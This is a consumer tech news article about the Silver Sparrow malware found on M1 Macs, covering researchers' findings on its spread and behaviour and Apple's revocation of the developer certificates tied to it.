Apple Deploys Countermeasures Against Pesky Silver Sparrow Malware But Is Your Mac Affected?

MacBook Pro
If there is one thing I learned from cartoons in the 1980s, it is that knowing is the half the battle. Thank you G.I. Joe for that tidbit. Fast forward several decades later and that lesson is playing out right before our very eyes, in relation to another malware strain that is able to run natively on Apple's fancy new custom M1 processor. Apple knows about it and has taken steps to stop it from spreading (more on that in a bit).

Apple is embarking on a two-year transition phase, in which it is moving completely away from using Intel's CPUs in its Mac systems, in favor of in-house designs based on Arm. The first of those is the M1 chip. We have already spent some hands-on time with the M1 as part of our Mac mini 2020 review, which we found to be a "potent little machine."

The M1 is a spunky chip for sure, and apparently it is attracting the attention of bad actors. Last week we wrote about the first bit of malware in the wild that is native to the M1 chip, and now researchers have found a separate malware strain that has infected around 30,000 Mac systems with an M1 SoC inside, across 153 countries.

Called "Silver Sparrow," security researchers at Red Canary describe it as an activity cluster that includes a binary compiled to run on M1 chips. Oddly enough, Silver Sparrow is missing a payload, though that is not necessarily reason to rest easy.

"Though we haven’t observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat, uniquely positioned to deliver a potentially impactful payload at a moment’s notice," the researchers explain.

Silver Sparrow users the macOS Installer JavaScript API to infect systems with an M1 processor. Once a Mac is infected, it checks in with a control server every hour to see if there are any commands to execute further files to download.

Fortunately, this new threat was found relatively early, before it could do any actual damage. And because knowing is half the battle, Apple has been able to neutralize the threat. A spokesperson told AppleInsider that Apple has revoked certificates for developer accounts tied to the malware's creator, which essentially prevents Silver Sparrow from spreading.

Apple also points out that it leverages various different hardware and software security protections, in addition to doling out regular updates. In other words, Apple is not real concerned about this one.